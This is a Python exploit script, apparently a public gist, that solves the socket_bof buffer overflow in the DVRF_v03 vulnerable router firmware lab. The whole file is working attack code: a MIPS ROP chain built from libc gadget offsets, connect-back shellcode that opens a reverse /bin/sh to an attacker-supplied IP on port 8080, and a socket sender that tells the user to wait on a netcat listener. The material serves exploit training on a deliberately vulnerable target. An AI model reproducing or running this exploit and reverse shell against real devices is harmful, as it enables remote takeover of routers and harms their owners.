@gitpraetorianlabs
Last active June 2, 2016 19:01
import socket, sys , base64, struct, string, time
from getopt import getopt as GetOpt, GetoptError
def usage():
    """Print the command-line help for this script and exit with status 1.

    The -s/-d/-p flags described here are the ones the option loop below
    reads; -h is listed but only the loop decides what it does.
    """
    help_lines = [
        "",
        "Socket_bof solution for DVRF_v03",
        "By: Elvis Collado [b1ack0wl]",
        "",
        "Usage: %s -s source.ip -d dst.ip -p dst.port" % sys.argv[0],
        "",
        "\t-s Connect back IP",
        "\t-d Destination IP of Socket Listener",
        "\t-p Destination Port that socket_bof is listening on",
        "\t-h Print this Help Menu",
        "",
    ]
    # One write instead of one print per line; the bytes on stdout are the same.
    print("\n".join(help_lines))
    sys.exit(1)
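# --- Command-line handling ---------------------------------------------------
# Required: -s (connect-back IP, packed into IP_1..IP_4 for the shellcode),
#           -d (target host), -p (target port).  -h prints the help text.
try:
    (opts, args) = GetOpt(sys.argv[1:], 's:d:p:h')
except GetoptError:
    usage()

# Pre-bind the values the rest of the script reads, so a missing option is
# reported below instead of surfacing later as a NameError.
host = None
port = None
IP_1 = IP_2 = IP_3 = IP_4 = None

for opt, arg in opts:
    if opt == "-h":
        # The help flag was previously ignored (fell through to `continue`).
        usage()
    elif opt == "-s":
        connectback_ip = arg.split(".")
        # Each octet is packed to a single raw byte, so reject anything that is
        # not a four-part dotted quad of in-range integers before packing.
        if len(connectback_ip) != 4:
            print("Connect back IP must be a dotted quad (a.b.c.d)")
            sys.exit(1)
        octets = []
        for a in connectback_ip:
            try:
                value = int(a)
            except ValueError:
                print("Connect back IP octet is not a number: %s" % a)
                sys.exit(1)
            if value == 0:
                # A zero octet packs to a \x00 byte, which the author rejects.
                print("IP cannot have NULL Bytes :(")
                sys.exit(1)
            if value < 0 or value > 255:
                print("Connect back IP octet out of range: %s" % a)
                sys.exit(1)
            octets.append(value)
        IP_1, IP_2, IP_3, IP_4 = [struct.pack("<B", value) for value in octets]
    elif opt == "-d":
        host = arg
    elif opt == "-p":
        port = int(arg)

# All three options are needed downstream; show the usage text if any is absent.
if host is None or port is None or IP_1 is None:
    usage()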
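# --- Connect to the target ---------------------------------------------------
try:
    # create an AF_INET, STREAM socket (TCP)
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
except socket.error as msg:
    # Format the exception itself: indexing msg[0]/msg[1] fails when the error
    # does not carry an (errno, strerror) pair.
    print('Failed to create socket: %s' % msg)
    sys.exit()

try:
    remote_ip = socket.gethostbyname(host)
except socket.gaierror:
    # could not resolve
    print('Hostname could not be resolved. Exiting')
    sys.exit()

# Connect to remote server.  A refused or timed-out connection is reported
# here instead of escaping as an unhandled socket.error traceback.
try:
    s.connect((remote_ip, port))
except socket.error as msg:
    print('Failed to connect to %s:%d : %s' % (remote_ip, port, msg))
    s.close()
    sys.exit()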
# Shellcode From bowcaster
# Connect-back payload kept as raw 4-byte instruction words (the mnemonics in
# the trailing comments are MIPS; each comment is the author's disassembly of
# that word).  Two fields are not fixed constants:
#   - the listener port is the pair of words under "Connect back port 8080";
#     it is hard-coded here and is independent of -p, which is the port
#     socket_bof itself listens on;
#   - the connect-back address is spliced in from IP_1..IP_4, the octets packed
#     from the -s option (presumably why the option loop refuses a zero octet).
# The entries are joined as-is, so editing or reordering any of them changes
# the bytes that are sent.
shellcode = string.join([
    "\xfa\xff\x0f\x24", # li t7,-6
    "\x27\x78\xe0\x01", # nor t7,t7,zero
    "\xfd\xff\xe4\x21", # addi a0,t7,-3
    "\xfd\xff\xe5\x21", # addi a1,t7,-3
    "\xff\xff\x06\x28", # slti a2,zero,-1
    "\x57\x10\x02\x24", # li v0,4183
    "\x0c\x01\x01\x01", # syscall 0x40404
    "\xff\xff\xa2\xaf", # sw v0,-1(sp)
    "\xff\xff\xa4\x8f", # lw a0,-1(sp)
    "\xfd\xff\x0f\x3c", # lui t7,0xfffd
    "\x27\x78\xe0\x01", # nor t7,t7,zero
    "\xe0\xff\xaf\xaf", # sw t7,-32(sp)
    # Connect back port 8080
    "\x1f\x90\x0e\x3c", # lui t6,0x901f
    "\x1f\x90\xce\x35", # ori t6,t6,0x901f
    "\xe4\xff\xae\xaf", # sw t6,-28(sp)
    # IP Address (octets 3,4 in the lui word, octets 1,2 in the ori word)
    IP_3+IP_4+"\x0e\x3c", # lui t6,<ip>
    IP_1+IP_2+"\xce\x35", # ori t6,t6,<ip>
    "\xe6\xff\xae\xaf", # sw t6,-26(sp)
    "\xe2\xff\xa5\x27", # addiu a1,sp,-30
    "\xef\xff\x0c\x24", # li t4,-17
    "\x27\x30\x80\x01", # nor a2,t4,zero
    "\x4a\x10\x02\x24", # li v0,4170
    "\x0c\x01\x01\x01", # syscall 0x40404
    "\xfd\xff\x0f\x24", # li t7,-3
    "\x27\x78\xe0\x01", # nor t7,t7,zero
    "\xff\xff\xa4\x8f", # lw a0,-1(sp)
    "\x21\x28\xe0\x01", # move a1,t7
    "\xdf\x0f\x02\x24", # li v0,4063
    "\x0c\x01\x01\x01", # syscall 0x40404
    "\xff\xff\x10\x24", # li s0,-1
    "\xff\xff\xef\x21", # addi t7,t7,-1
    "\xfa\xff\xf0\x15", # bne t7,s0,68 <dup2_loop>
    "\xff\xff\x06\x28", # slti a2,zero,-1
    "\x62\x69\x0f\x3c", # lui t7,0x6962
    "\x2f\x2f\xef\x35", # ori t7,t7,0x2f2f
    "\xec\xff\xaf\xaf", # sw t7,-20(sp)
    "\x73\x68\x0e\x3c", # lui t6,0x6873
    "\x6e\x2f\xce\x35", # ori t6,t6,0x2f6e
    "\xf0\xff\xae\xaf", # sw t6,-16(sp)
    "\xf4\xff\xa0\xaf", # sw zero,-12(sp)
    "\xec\xff\xa4\x27", # addiu a0,sp,-20
    "\xf8\xff\xa4\xaf", # sw a0,-8(sp)
    "\xfc\xff\xa0\xaf", # sw zero,-4(sp)
    "\xf8\xff\xa5\x27", # addiu a1,sp,-8
    "\xab\x0f\x02\x24", # li v0,4011
    "\x0c\x01\x01\x01" # syscall 0x40404
], '')
# sleep = 0x767142b0 qemu
# sleep = 0x2ab6d2b0 device
# libraries and offsets
# Every gadget address below is libc + offset, so the chain is tied to one
# fixed libc base.  The commented-out alternative 0x766e5000 is the qemu base:
# 0x766e5000 + sleep_offset = 0x767142b0 and 0x2ab3e000 + sleep_offset =
# 0x2ab6d2b0, i.e. the two sleep addresses noted above.
libc = 0x2ab3e000 #0x766e5000 #0x2ab3e000 #
sleep_offset = 0x0002f2b0
rop1_offset = 0x000377cc # to get s1 and s0
rop2_offset = 0x000189ec # move t9, s0 jalr t9, nop
rop3_offset = 0x00033d8c # sp into a1
rop4_offset = 0x0001fbcc # a1 into t9 then jump to t9
# Craft Exploit
# Built front to back.  Each struct.pack("<L", ...) is one little-endian 32-bit
# word; the A/B/C/D runs are padding per the author's comments.  The s0/s1/ra
# slot comments on the first three packed words match the lw offsets (0x28,
# 0x2c, 0x30) of Gadget 1 in the listing at the end of this section, which
# also documents the other three gadgets.
message = "A" * 51 # Padding
message += struct.pack("<L", libc+rop1_offset) # RA rop1
message += "B" * 40 # padding for lw offset
#Gadget 2 - sleep
message += struct.pack("<L", libc+sleep_offset) #s0 0x28
message += "MMMM" #s1 0x2c
message += struct.pack("<L", libc+rop2_offset) #ra 0x30
# Gadget 3
message += "C" * 60
message += "0" * 4 # s0
message += "1" * 4 # s1
message += "2" * 4 # s2
message += "3" * 4 # s3
message += "4" * 4 # s4
message += struct.pack("<L", libc+rop3_offset) # RA
# Gadget 4
message += "D" * (72-48)
# XOR s0, s0
message += struct.pack("<L",0x02108026) #xor s0 s0
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L",0x02b5a826)
message += struct.pack("<L", 0xafb0fff8) # sw s0, -8(sp)
#One more Sleep for 5 seconds
# nop to shellcode
message += struct.pack("<L",0x02b5a826) * 8 # xor s5,s5
message += struct.pack("<L", libc+rop4_offset) # RA then null
# NOTE(review): the same word (0xafa0fffc, bytes \xfc\xff\xa0\xaf) is annotated
# "sw zero,-4(sp)" in the shellcode above; the register named in the comment on
# the next line may be a typo.
message += struct.pack("<L", 0xafa0fffc) # sw s0, -4(sp)
message += shellcode
# Author's disassembly of the four gadgets referenced by the offsets above.
# This is a bare string expression, not a docstring, and has no runtime effect.
'''
# a0 for sleep is 5 - first gadget
Gadget 1
0x000377cc 3000bf8f lw ra, 0x30(sp)
0x000377d0 2c00b18f lw s1, 0x2c(sp)
0x000377d4 2800b08f lw s0, 0x28(sp)
0x000377d8 0800e003 jr ra
Gadget 2
0x000189ec 21c80002 move t9, s0
0x000189f0 09f82003 jalr t9
0x000189f4 01000524 addiu a1, zero, 1
0x000189f8 02000010 b 0x18a04
Gadget 3
0x00033d8c 1800a527 addiu a1, sp, 0x18
0x00033d90 1000bc8f lw gp, 0x10(sp)
0x00033d94 4800bf8f lw ra, 0x48(sp)
0x00033d98 0800e003 jr ra
Gadget 4
0x0001fbcc 21c8a000 move t9, a1
0x0001fbd0 38008424 addiu a0, a0, 0x38
0x0001fbd4 08002003 jr t9
'''
# --- Send the crafted message and finish ------------------------------------
try:
    # Set the whole string: sendall() keeps writing until every byte is out.
    s.sendall(message)
except socket.error:
    # Send failed
    print('Send failed')
    sys.exit()
else:
    # Only reached when sendall() returned without raising.
    print('Exploit Sent - Check your netcat listener in about 5 seconds.')
    s.close()